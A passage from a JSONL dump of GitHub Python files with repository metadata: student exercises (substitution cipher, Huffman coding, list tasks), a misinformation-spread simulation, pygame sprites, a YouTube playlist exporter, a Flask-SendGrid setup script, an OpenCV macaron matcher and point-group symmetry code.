“QTGABCDEFHIWKOJNMPUSRVXYZL\"\r\n :return: the decrypted version of the message\r\n \"\"\"\r\n s = s.upper()\r\n cipher = cipher.upper()\r\n print(\"original: \", s)\r\n encrypted_message = ''\r\n\r\n for i in range(len(s)):\r\n # find the index in the cipher\r\n cipher_index = cipher.find(s[i]) # index of the letter to use from the cipher\r\n decipher_index = cipher_index + 65 # int code for the letter A\r\n encrypted_message = encrypted_message + chr(decipher_index) # chr() is the opposite function of ord()\r\n\r\n return encrypted_message\r\n\r\n\r\n# main program\r\nprint('decrypted message', substition_decipher('EBWWJ', 'QTGABCDEFHIWKOJNMPUSRVXYZL'))\r\n","repo_name":"F4P1E/COSC2429_Introduction_To_Programming","sub_path":"Tutorial Week 6/q8substitution_decypher.py","file_name":"q8substitution_decypher.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10561676168","text":"class node:\n def __init__(self,freq, symbol,left=None, right=None):\n self.freq = freq\n self.symbol = symbol\n self.right = right \n self.left = left \n self.huff = \"\"\n \ndef PrintNodes(node,val=\"\"):\n newVal = val + str(node.huff)\n if(node.left):\n PrintNodes(node.left, newVal)\n if(node.right):\n PrintNodes(node.right, newVal)\n if(not node.left and not node.right):\n print(f\"{node.symbol} ==> {newVal}\")\n\n \nchars = ['a', 'b', 'c', 'd', 'e', 'f']\n \n# frequency of characters\nfreq = [ 5, 9, 12, 13, 16, 45]\n \n# list containing unused nodes\nnodes = []\n \n# converting characters and frequencies\n# into huffman tree nodes\nfor x in range(len(chars)):\n nodes.append(node(freq[x], chars[x]))\n# for i in range(len(nodes)):\n# print(nodes[i].freq, nodes[i].symbol , nodes[i].left , nodes[i].right, nodes[i].huff ) \n \nwhile len(nodes) > 1 :\n nodes = sorted(nodes, key=lambda x: x.freq)\n left = nodes[0]\n right = nodes[1]\n right.huff = 1\n left.huff = 0\n \n newnode = node(left.freq+right.freq , left.symbol + right.symbol, left , right)\n nodes.remove(left)\n nodes.remove(right)\n nodes.append(newnode)\n\nPrintNodes(nodes[0])\n \n ","repo_name":"AliNormohammmadzadeh/DSA","sub_path":"etc/Huffman.py","file_name":"Huffman.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15954620449","text":"# Задача 16: \n# Требуется вычислить, сколько раз встречается некоторое число X в массиве из случайных чисел. \n# Пользователь в первой строке вводит натуральное число N – количество элементов в массиве. \n# Последняя строка содержит число X\n# *Пример:*\n\n# 5\n# 1 2 3 4 5\n# 3\n# -> 1\n\nimport random\n\nn = int(input('Enter the number of elements: '))\nx = int(input('Enter the number you want to find: '))\narray = []\ncounter = 0\n\nfor i in range(0, n - 1):\n array.append(random.randint(1, 9))\n if x == array[i]:\n counter += 1\n if i + 2 == n:\n array.append(i + 2)\nprint(array)\nprint(counter)\n","repo_name":"ArturFg/DZ_PY2","sub_path":"dz_sim2/dz_sim3,1.py","file_name":"dz_sim3,1.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31389297226","text":"q=input()\r\np=list(q)\r\nl=[]\r\nk=[]\r\nj=[]\r\nm=[]\r\nm.sort()\r\nfor i in p:\r\n if i.isupper()==True:\r\n l.append(i)\r\n elif i.islower()==True:\r\n k.append(i)\r\n elif i.isdigit()==True:\r\n if int(i)%2==0:\r\n j.append(i)\r\n else:\r\n m.append(i)\r\nl.sort()\r\nk.sort()\r\nj.sort()\r\nm.sort()\r\n\r\nprint(''.join(k+l+m+j))\r\n","repo_name":"sonukumar143/hacker-rank-python","sub_path":"TASK_2/10/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3166546060","text":"import math \nimport numpy\nimport igraph\n\npersonWeights = [] #weight list for each agent\nn = 10 # number of agents\npZero = .1 # probability of zero\ncloseness = 100 #how close agents are in model. high values = closer agents\nthreshold = .5\nfor i in range (0,n):\n personWeights.append([0] * n) #initialize 0 lists\n\nfor i in range (0,n):\n for j in range (0,n): \n m = numpy.random.uniform(low = 0, high = 1) \n if(m < pZero): #used for setting 0 values in open\n r = 0\n else: \n r = round(numpy.random.exponential(scale = closeness) + 1,2) #random closeness value with less links of high closeness\n if(j != i):\n personWeights[i][j] = r #making weights symmetric\n personWeights[j][i] = r\n \n else:\n personWeights[i][i] = 0 #1 connection w/ self.\n#for i in range (0,n):\n # print(\"Initial Person Weights:\" + str(i) + str(personWeights[i]))\n#plotting initial graph from adjacency matrix \n#G = igraph.Graph.Weighted_Adjacency(personWeights)\n#layout = G.layout(\"lgl\")\n#igraph.plot(G,layout=layout)\n\n#initalize sList\ndef sigmoid(x): \n return 1/(1+ math.exp(-x))\n\nseed = numpy.random.randint(0, n)\nsList = [0]*n \nsList[seed] = 1 #setting initial believer of misinformation\np = .1 #believability of hoax \nprint(\"seed = \" + str(seed))\nprint(\"sList:\" + str(-1) + str(sList))\n\ndef updateS(weightList, sList, p):\n updateList = sList.copy() #used for pointer stuff\n for i in range(0,len(weightList)):\n influenceFromContacts = 0\n for j in range (0, len(weightList)):\n\n influenceFromContacts+=sList[j]*p*weightList[i][j] #what is update? how to bound it (maybe (0,1)) maybe sigmoid\n\n\n update = influenceFromContacts\n updateList[i] = round(update,2)\n return updateList\n\n\ndef cutTies(weightList,sList):\n numberofCutTies = 0\n for i in range(0,len(weightList)):\n for j in range(0,len(weightList)):\n difference = abs(sList[i] - sList[j])\n\n\n if(sigmoid(difference) > threshold and weightList[i][j] != 0): #what is threshold?\n\n\n weightList[i][j] = 0\n weightList[j][i] = 0\n numberofCutTies+=1\n\n print(numberofCutTies)\n\nfor i in range (0,4): \n updateS(personWeights,sList,p)\n cutTies(personWeights,sList)\n sList = updateS(personWeights,sList,p)\n print(\"sList:\" + str(i) + str(sList))\nfor i in range (0,n): \n print(\"End PersonWeights:\" + str(i) + str(personWeights[i]))\n\n \n##to-do: output measures we want \n\n\n#problems: \n#should we have constant threshold?\n#is sigmoid good? how can we bound so that these are comparable\n#what function should we use for the update each time that is reasonable\n#what function should we use to \"cut ties\"\n#how do we initialize the weights in a way that make sense?\n#how do we appropriately bound weights/s scores so that they are easily comparable? ","repo_name":"Garrett-Allen/Polisci-427s","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"22957513673","text":"import pygame as pg\nfrom .settings import *\n\nvec = pg.math.Vector2\n\n\ndef collide_with_rects(one, two):\n return one.hit_rect.colliderect(two.rect)\n\n\ndef collide_with_walls(sprite, group, dir):\n if dir == \"x\":\n hits = pg.sprite.spritecollide(sprite, group, False, collide_with_rects)\n if hits:\n if sprite.vel.x > 0:\n sprite.pos.x = hits[0].rect.left - sprite.hit_rect.width / 2\n if sprite.vel.x < 0:\n sprite.pos.x = hits[0].rect.right + sprite.hit_rect.width / 2\n sprite.vel.x = 0\n sprite.hit_rect.centerx = sprite.pos.x\n if dir == \"y\":\n hits = pg.sprite.spritecollide(sprite, group, False, collide_with_rects)\n if hits:\n if sprite.vel.y > 0:\n sprite.pos.y = hits[0].rect.top - sprite.hit_rect.height / 2\n if sprite.vel.y < 0:\n sprite.pos.y = hits[0].rect.bottom + sprite.hit_rect.height / 2\n sprite.vel.y = 0\n sprite.hit_rect.centery = sprite.pos.y\n\n\nclass Player(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.players\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = game.player_image\n self.rect = self.image.get_rect()\n self.hit_rect = PLAYER_HIT_RECT\n self.hit_rect.center = self.rect.center\n self.vel = vec(0, 0)\n self.pos = vec(x, y) * TILESIZE\n self.rot = 0\n\n def get_action_input(self, action=0):\n\n if action == 0:\n # do nothing\n # set vx and vy = 0 if no key is pressed\n self.vel = vec(0, 0)\n self.rot_speed = 0\n elif action == 1:\n # forward and turn left\n self.rot_speed = PLAYER_SPEED\n self.vel = vec(PLAYER_SPEED * 0.9, 0).rotate(-self.rot)\n elif action == 2:\n # foward and turn right\n self.rot_speed = -PLAYER_SPEED\n self.vel = vec(PLAYER_SPEED * 0.9, 0).rotate(-self.rot)\n elif action == 3:\n # only forward\n self.vel = vec(PLAYER_SPEED * 0.9, 0).rotate(-self.rot)\n\n def get_action_input_type_2(self, action=0):\n\n # left is just turning 45 degree left and same with right\n if action == 0:\n # do nothing\n # set vx and vy = 0 if no key is pressed\n self.vel = vec(0, 0)\n self.rot_speed = 0\n elif action == 1:\n # turn left\n self.vel = vec(0, 0)\n self.rot_speed = PLAYER_SPEED * 2\n elif action == 2:\n # turn right\n self.vel = vec(0, 0)\n self.rot_speed = -PLAYER_SPEED * 2\n elif action == 3:\n # only forward\n self.rot_speed = 0\n self.vel = vec(PLAYER_SPEED, 0).rotate(-self.rot)\n\n def update(self):\n if self.rot_speed != 0:\n self.rot = (self.rot + self.rot_speed * self.game.dt) % 360\n self.image = pg.transform.rotate(self.game.player_image, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.pos\n self.pos += self.vel * self.game.dt\n self.hit_rect.centerx = self.pos.x\n collide_with_walls(self, self.game.walls, \"x\")\n collide_with_walls(self, self.game.goals, \"x\")\n\n self.hit_rect.centery = self.pos.y\n collide_with_walls(self, self.game.walls, \"y\")\n collide_with_walls(self, self.game.goals, \"y\")\n self.rect.center = self.hit_rect.center\n\n\nclass Mob(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.mobs\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.mob_image\n self.rect = self.image.get_rect()\n self.hit_rect = MOB_HIT_RECT.copy()\n self.hit_rect.center = self.rect.center\n self.pos = vec(x, y) * TILESIZE\n self.rect.center = self.pos\n self.rot = 0\n self.vel = vec(0, 0)\n self.acc = vec(0, 0)\n\n def avoid_mobs(self):\n for mob in self.game.mobs:\n if mob != self:\n dist = self.pos - mob.pos\n if 0 < dist.length() < MOB_AVOID_RADIUS:\n self.acc += dist.normalize()\n\n def update(self):\n self.rot = (self.game.player.pos - self.pos).angle_to(vec(1, 0))\n self.image = pg.transform.rotate(self.game.mob_image, self.rot)\n self.rect = self.image.get_rect()\n self.rect.center = self.pos\n self.acc = vec(1, 0).rotate(-self.rot)\n self.avoid_mobs()\n if self.acc.length_squared() > 0:\n self.acc.scale_to_length(MOB_SPEED)\n self.acc += self.vel * -1\n self.vel += self.acc * self.game.dt\n self.pos += self.vel * self.game.dt + 0.5 * self.acc * self.game.dt ** 2\n self.hit_rect.centerx = self.pos.x\n collide_with_walls(self, self.game.walls, \"x\")\n self.hit_rect.centery = self.pos.y\n collide_with_walls(self, self.game.walls, \"y\")\n self.rect.center = self.hit_rect.center\n\n\nclass Wall(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.walls\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.tile_image\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n\n\nclass Goal(pg.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.all_sprites, game.goals\n pg.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.goal_image\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.rect.x = x * TILESIZE\n self.rect.y = y * TILESIZE\n","repo_name":"sen-pai/gym_tag","sub_path":"gym_tag/envs/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":5890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23345799026","text":"import os\nimport google.auth\nfrom google.oauth2.credentials import Credentials\nfrom googleapiclient.discovery import build\n\n# Set the path to the credentials file\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = 'Path\\to\\your\\credential\\json\\file' # <-- edit here\n\n# Get the credentials\ncreds, project_id = google.auth.default(scopes=['https://www.googleapis.com/auth/youtube.force-ssl'])\n\n# Build the API client\nyoutube = build('youtube', 'v3', credentials=creds)\n\n# Set the ID of the playlist you want to extract\nplaylist_id = 'your youtube playlist ID' # <-- edit here\n\n# Get the first page of the playlist items\nrequest = youtube.playlistItems().list(\n part='snippet',\n playlistId=playlist_id,\n maxResults=50\n)\nresponse = request.execute()\n\n# Keep looping until all pages have been processed\nwhile request is not None:\n # Get the next page of playlist items\n next_page_token = response.get('nextPageToken')\n items = response.get('items', [])\n\n # Extract the video IDs from the playlist items\n video_ids = [item['snippet']['resourceId']['videoId'] for item in items]\n\n # Save the video IDs to a file\n with open('video_ids.txt', 'a') as f:\n for video_id in video_ids:\n f.write(f'https://youtu.be/{video_id}\\n')\n\n # Exit the loop if there are no more pages\n if next_page_token is None:\n break\n\n # Prepare the next page request\n request = youtube.playlistItems().list(\n part='snippet',\n playlistId=playlist_id,\n maxResults=50,\n pageToken=next_page_token\n )\n response = request.execute()\n","repo_name":"08ben2011/youtubeLinks","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35584010520","text":"import unittest\nfrom q03_01_three_in_one import three_in_one\n\n\nclass TestQ03_01ThreeInOne(unittest.TestCase):\n def setUp(self):\n self.arr_len = 20\n\n def test_three_in_one(self):\n a, b, c = three_in_one(self.arr_len)\n arr = []\n for e in a:\n arr.append(e)\n for e in b:\n arr.append(e)\n for e in c:\n arr.append(e)\n for i in range(self.arr_len):\n self.assertEqual(i, arr[i])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"nhenninger/CrackingTheCodingInterview6e","sub_path":"ch03_Stacks_and_Queues/test_q03_01_three_in_one.py","file_name":"test_q03_01_three_in_one.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"73949546467","text":"\"\"\"\nFlask-SendGrid\n==============\n\nA Flask Extension to bridge between `Flask-Mandrill `_\nand sending emails with `SendGrid `_\n\nInstallation\n````````````\n\n.. code:: bash\n\n $ pip install flask-sendgrid\n\n\nUsage\n`````\n\n.. code:: python\n\n from flask import Flask\n from flask.ext.sendgrid import SendGrid\n\n app = Flask(__name__)\n app.config['SENDGRID_API_KEY'] = 'your api key'\n sendgrid = SendGrid(app)\n sendgrid.send_email(\n from_email='someone@yourdomain.com',\n to_email='someoneelse@someotherdomain.com',\n subject='Subject'\n text='Body',\n )\n\"\"\"\n\nimport sys\n\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\n\n\ndef get_requirements(suffix=''):\n with open('requirements%s.txt' % suffix) as f:\n rv = f.read().splitlines()\n return rv\n\n\ndef get_version():\n with open('flask_sendgrid.py', 'r') as fd:\n for line in fd:\n if line.startswith('__version__ = '):\n return line.split()[-1].strip().strip(\"'\")\n\n\nclass PyTest(TestCommand):\n\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = [\n '-v',\n '-xrs',\n '--cov', '.',\n '--cov-report', 'term-missing',\n '--pep8',\n '--flakes',\n '--cache-clear'\n ]\n self.test_suite = True\n\n def run_tests(self):\n import pytest\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\n_version = get_version()\n\n\nsetup(\n name='Flask-SendGrid',\n version=_version,\n url='http://github.com/frankv/flask-sendgrid',\n download_url='https://github.com/frankv/flask-sendgrid/tarball/' + _version,\n license='MIT',\n author='Frank Valcarcel',\n author_email='frank@cuttlesoft.com',\n description='Adds SendGrid support to Flask applications',\n long_description=open('README.rst').read() + '\\n\\n' + open('HISTORY.rst').read(),\n keywords=['Flask', 'SendGrid', 'email', 'smtp'],\n py_modules=['flask_sendgrid'],\n zip_safe=False,\n platforms='any',\n install_requires=['SendGrid'],\n tests_require=get_requirements('-test'),\n cmdclass={'test': PyTest},\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules']\n)\n","repo_name":"frankV/flask-sendgrid","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"70"}
+{"seq_id":"28647530711","text":"import os\nimport argparse\nfrom typing import Tuple, List\n\nimport cv2\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n\nclass Matcher:\n raw_path: str\n out_path: str\n line_color: Tuple[int]\n line_thickness: int\n im_raw: np.ndarray\n im_rgb: np.ndarray\n im_hsv: np.ndarray\n im_gray: np.ndarray\n im_filt: np.ndarray\n im_canny: np.ndarray\n im_closed: np.ndarray\n all_contours: List[np.ndarray]\n filt_contours: List[np.ndarray]\n ordered_contours: List[np.ndarray]\n\n def __init__(self, raw_path: str, out_path: str):\n self.raw_path = raw_path\n self.out_dir = out_path\n\n # Plotting/drawing defaults\n self.line_color = (255, 0, 0)\n self.line_thickness = 2\n self.line_type = cv2.LINE_AA\n self.font_face = cv2.FONT_HERSHEY_SIMPLEX\n self.font_scale = 1\n self.figsize = (16, 16)\n\n def match(self):\n\n (\n self.read_image()\n .preprocess_color_space()\n .get_highest_contrast_channel()\n .apply_bilateral_filter()\n .detect_edges()\n .close_open_edges()\n .find_contours()\n .draw_contours(self.all_contours, \"01-all-contours.png\")\n .filter_contours()\n .draw_contours(self.filt_contours, \"02-final-contours.png\", num=True)\n .sort_and_pair()\n .draw_paired_contours(\"03-final-matches.png\")\n )\n\n def read_image(self):\n if not os.path.isfile(self.raw_path):\n raise FileNotFoundError(f\"File not found at {self.raw_path}\")\n self.im_raw = cv2.imread(self.raw_path)\n return self\n\n def preprocess_color_space(self):\n self.im_rgb = cv2.cvtColor(self.im_raw, cv2.COLOR_BGR2RGB)\n self.im_hsv = cv2.cvtColor(self.im_rgb, cv2.COLOR_RGB2HSV)\n return self\n\n def get_highest_contrast_channel(self):\n channels = cv2.split(self.im_hsv)\n contrasts = [x.std() for x in channels]\n idx_max = np.argmax(contrasts)\n print(f\"Highest contrast is channel {idx_max}: {contrasts[idx_max]}\")\n self.im_gray = channels[idx_max]\n return self\n\n def apply_bilateral_filter(\n self, d: int = 5, sigma_color: int = 175, sigma_space: int = 175\n ):\n self.im_filt = cv2.bilateralFilter(self.im_gray, d, sigma_color, sigma_space)\n return self\n\n def detect_edges(self, min_val: int = 100, max_val: int = 150):\n self.im_canny = cv2.Canny(self.im_filt, min_val, max_val)\n return self\n\n def close_open_edges(\n self, kernel_size: Tuple[int] = (2, 2), num_iterations: int = 1\n ):\n kernel = np.ones(kernel_size, np.uint8)\n self.im_closed = cv2.morphologyEx(\n self.im_canny, cv2.MORPH_CLOSE, kernel, iterations=num_iterations\n )\n return self\n\n def find_contours(self):\n self.all_contours, _ = cv2.findContours(\n self.im_closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE\n )\n print(f\"Detected {len(self.all_contours)} contours\")\n return self\n\n def filter_contours(self, top_n: int = 30, min_points: int = 8):\n\n # Minimum area = half of mean area of top N contours\n cnt_areas = [cv2.contourArea(x) for x in self.all_contours]\n cnt_areas_top_n = sorted(cnt_areas)[-top_n:]\n cnt_areas_median = cnt_areas_top_n[top_n // 2]\n min_area = 0.5 * cnt_areas_median\n\n # Keep only circular contours above min_area and min_points\n circles = []\n for i in self.all_contours:\n\n # Approximate contours as simple polygon\n epsilon = 0.01 * cv2.arcLength(i, True)\n approx = cv2.approxPolyDP(i, epsilon, closed=True)\n\n # Keep only if approximate polygon is like a circle\n area = cv2.contourArea(i)\n if len(approx) > min_points and area > min_area:\n circles.append(i)\n\n self.filt_contours = circles\n print(f\"Kept {len(self.filt_contours)} of {len(self.all_contours)} contours\")\n return self\n\n def draw_contours(self, cnt: List[np.ndarray], out_name: str, num: bool = False):\n\n # Draw contours\n plt.figure(figsize=self.figsize)\n im_temp = self.im_rgb.copy()\n cv2.drawContours(im_temp, cnt, -1, self.line_color, self.line_thickness)\n\n # Label each contour with a number\n if num:\n for idx, i in enumerate(cnt):\n\n # Compute contour centroid\n m = cv2.moments(i)\n x = int(m[\"m10\"] / m[\"m00\"])\n y = int(m[\"m01\"] / m[\"m00\"])\n\n # Label text\n cv2.putText(\n im_temp,\n text=str(idx + 1),\n org=(x, y),\n fontFace=self.font_face,\n fontScale=self.font_scale,\n color=self.line_color,\n thickness=self.line_thickness,\n lineType=self.line_type,\n )\n\n # Plot and save figure\n output_name = os.path.join(self.out_dir, out_name)\n plt.imshow(im_temp)\n plt.savefig(output_name)\n\n return self\n\n def sort_and_pair(self):\n sorted_contours = sorted(self.filt_contours, key=lambda x: cv2.contourArea(x))\n odd_idx = list(range(0, len(self.filt_contours) - 1, 2))\n self.ordered_contours = [\n (sorted_contours[x], sorted_contours[x + 1]) for x in odd_idx\n ]\n print(f\"{len(odd_idx) * 2} of {len(sorted_contours)} contours paired\")\n return self\n\n def draw_paired_contours(self, out_name: str):\n\n plt.figure(figsize=self.figsize)\n im_temp = self.im_rgb.copy()\n cmap = matplotlib.cm.get_cmap(\"Dark2\")\n\n for idx, i in enumerate(self.ordered_contours):\n\n # Draw circle\n r, g, b, a = (int(x) for x in cmap(idx % cmap.N, bytes=True))\n line_color = (r, g, b)\n cv2.drawContours(im_temp, i, -1, line_color, thickness=cv2.FILLED)\n\n for j in i:\n # Label with pair idx\n m = cv2.moments(j)\n x = int(m[\"m10\"] / m[\"m00\"])\n y = int(m[\"m01\"] / m[\"m00\"])\n cv2.putText(\n im_temp,\n text=str(idx + 1),\n org=(x, y),\n fontFace=self.font_face,\n fontScale=self.font_scale,\n color=(255, 255, 255),\n thickness=self.line_thickness,\n lineType=self.line_type,\n )\n\n output_name = os.path.join(self.out_dir, out_name)\n plt.imshow(im_temp)\n plt.savefig(output_name)\n print(f\"Matches saved to f{output_name}\")\n\n return self\n\n\nif __name__ == \"__main__\":\n\n # Get inputs from user\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-i\", \"--input-path\", dest=\"raw_path\", help=\"filepath to input image\"\n )\n parser.add_argument(\n \"-o\", \"--output-path\", dest=\"out_path\", help=\"Directory to save outputs to\"\n )\n args = parser.parse_args()\n\n # Match\n Matcher(args.raw_path, args.out_path).match()\n","repo_name":"jtanwk/macaron-match","sub_path":"macaron-match/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":7217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"70298879268","text":"import smelli\nimport wcxf\nimport yaml\nimport ipywidgets as widgets\nfrom IPython.display import Markdown,display\n\n\n# allowed bases\n# WET: everything that can be translated to flavio\nbases_wet = ['flavio'] + [f for eft,f, t in wcxf.Basis['WET', 'flavio'].known_translators['to']]\n# SMEFT: everything that can be matched onto JMS\nbases_smeft = ['Warsaw'] + [b1 for eft1, b1, eft2, b2 in wcxf.Matcher.instances\n if eft1 == 'SMEFT' and eft2 == 'WET' and b2 == 'JMS'\n and b1 != 'Warsaw']\neft_bases = {'SMEFT': bases_smeft, 'WET': bases_wet}\n\ngl = None\n\n\ndef print_basis(basis):\n pass\n\ndef f_basis(eft):\n select_basis.options = eft_bases[eft]\n\n\nselect_eft = widgets.Select(options=['SMEFT', 'WET'])\ninit = select_eft.value\nselect_basis = widgets.Select(options=eft_bases[init])\n\nwidget_basis = widgets.interactive(print_basis, basis=select_basis)\nwidget_eft = widgets.interactive(f_basis, eft=select_eft)\n\ndef read_yaml(s):\n if not s:\n return {}\n d = yaml.load(s)\n return {k: complex(v) if isinstance(v, str) else v for k, v in d.items()}\n\nta_wc = widgets.Textarea(description=\"Wilson coefficients\",\n layout=widgets.Layout(min_width='50%', height='300px'),\n style={'description_width': 'initial'})\nt_scale = widgets.Text(description=\"Scale in GeV\", value='91.1876')\n\ndef basis_pdf_link(eft, basis):\n display(Markdown('[List of {0} {1} basis operators (PDF)](https://wcxf.github.io/assets/pdf/{0}.{1}.pdf)'.format(eft, basis)))\n\nout_basispdf = widgets.interactive_output(basis_pdf_link,\n {'eft': select_eft, 'basis': select_basis})\n","repo_name":"smelli/smelli-playground","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29444768698","text":"# =================================================\n\nimport numpy as np\n#from numpy import * \nfrom all_pg_irreps import all_pg_irreps\nfrom PG import symop, Pointgroup\nimport pickle as pk\nimport os\n\n# ======================================================\n\n'''\nfor i in range( 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\tassert len( xx['dv_irreps'] ) == len( xx['sym_ops'] ) \n\tfor j in range( len(xx['sym_ops']) ) :\n\t\tprint( xx[ 'sym_ops' ][j][0] )\n\t\tfor k in range( len(xx['dv_irrep_names']) ) :\n\t\t\tprint( xx['dv_irrep_names'][k] )\n\t\t\tprint( xx['dv_irreps'][j][k] )\n\t\tprint( '\\n' )\n\tprint( '\\n' )\n'''\n\n'''\nfor i in range( 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\tfor op in xx[ 'sym_ops' ] :\n\t\tmat = op[1]\n\t\tfind = False\n\t\top_square = ''\n\t\tfor opp in xx[ 'sym_ops' ] :\n\t\t\tmat_tmp = opp[1]\n\t\t\tif np.linalg.norm( np.dot( mat, mat ) - mat_tmp ) < 1e-6 :\n\t\t\t\tfind = True \n\t\t\t\top_square = opp[0] \n\t\tassert find \n\t\tprint( op[0], op_square )\n\tprint( '\\n' )\n'''\n\n\n# ==============================================================\n# test rep_decompose\n\n'''\nfrom decompose_into_irreps import decompose_rep\n\nfor i in range( 31, 32 ) :\n\tprint( 'PG:', (i+1) )\n\txx = all_pg_irreps[i]\n\tassert len( xx['dv_irreps'] ) == len( xx['sym_ops'] ) \n\treps = [ ]\n\tnrep = len( xx['dv_irrep_names'] )\n\tnop = len( xx['sym_ops'] )\n\tfor i in range( nrep ) :\n\t\trep = [ ]\n\t\tfor j in range( nop ) :\n\t\t\trep.append( xx['dv_irreps'][j][i] )\n\t\treps.append( rep )\n\t\n\t#for rep in reps :\n\t#\tprint( rep )\n\t#\tprint( '\\n' )\n\tprint( len(reps), len(reps[0]) )\n'''\t\n\n# ========================================================\n# find all Kramers pairs \n# ========================================================\n\n'''\nfor ipg in range( 32 ) :\n\tprint( 'PG:', ipg+1 )\n\tpg = all_pg_irreps[ipg]\n\top_square_dic = { }\n\tnop = len( pg['sym_ops'] )\n\tfor i in range( nop ) :\n\t\topp = [ j for j in range(nop) if np.linalg.norm( \\\n\t\t\tnp.dot( pg['sym_ops'][i][1], pg['sym_ops'][i][1] ) \\\n\t\t\t- pg['sym_ops'][j][1] ) < 1e-6 ]\n\t\tassert len(opp) == 1, ( len(opp), pg['sym_ops'][i][0] ) \n\t\topp = opp[0]\n\t\top_square_dic[i] = opp\n\t#\n\tKramers = [ ]\n\tnirreps = len( pg['dv_irrep_names'] )\n\tfor ir in range( nirreps ) :\n\t\tirrep = [ pg['dv_irreps'][k][ir] for k in range(nop) ]\n\t\tirrep_name = pg['dv_irrep_names'][ir]\n\t\t#print( irrep_name )\n\t\t#print( irrep )\n\t\tassert len( irrep ) == nop\t\t\n\t\ttot = 0\n\t\tfor iop in range(nop) :\n\t\t\tmat = irrep[iop]\n\t\t\tmat_2 = irrep[op_square_dic[iop]]\n\t\t\tzgg = 0\n\t\t\tpl = np.linalg.norm( np.dot( mat, mat ) - mat_2 ) \n\t\t\tmi = np.linalg.norm( np.dot( mat, mat ) + mat_2 ) \n\t\t\tif pl < 1e-4 :\n\t\t\t\tzgg = 1\n\t\t\telif pl > 1e-4 :\n\t\t\t\tzgg = -1\n\t\t\tassert zgg in [1,-1], ( ipg+1, irrep_name, mat, mat_2 )\n\t\t\tassert zgg in [1,-1], ( pg['sym_ops'][iop][0], pg['sym_ops'][op_square_dic[iop]][0] )\n\t\t\ttr = np.trace( mat_2 ) \n\t\t\ttot += zgg*tr\n\t\ttot = -tot/nop\n\t\treal = tot.real\n\t\timag = tot.imag\n\t\tassert abs( real - round(real) ) < 1e-4\n\t\tassert abs( imag ) < 1e-4\n\t\ttot = int(round(real))\n\t\t#print( 'tot:', tot )\n\t\tassert tot in [ 1, -1, 0 ], tot \n\t\tif tot == 1 : # degenerace is unchanged\n\t\t\tpair = [ irrep_name ]\n\t\t\tif pair not in Kramers :\n\t\t\t\tKramers.append( pair )\n\t\telif tot == -1 : # two same irreps are paired\n\t\t\tpair = [ irrep_name, irrep_name ] \n\t\t\tif pair not in Kramers :\n\t\t\t\tKramers.append( pair )\n\t\telse : # two conjugate irreps are paired \n\t\t\t# find conjugate irrep\n\t\t\tirrep_conj = [ ma.conjugate() for ma in irrep ]\n\t\t\tassert len( irrep_conj ) == nop, len( irrep_conj )\n\t\t\tfind_conj = False\n\t\t\tirrep_conj_name = ''\n\t\t\tfor jr in range( nirreps ) :\n\t\t\t\tirrep_tmp = [ pg['dv_irreps'][k][jr] for k in range(nop) ]\n\t\t\t\tirrep_name_tmp = pg['dv_irrep_names'][jr]\n\t\t\t\tassert len( 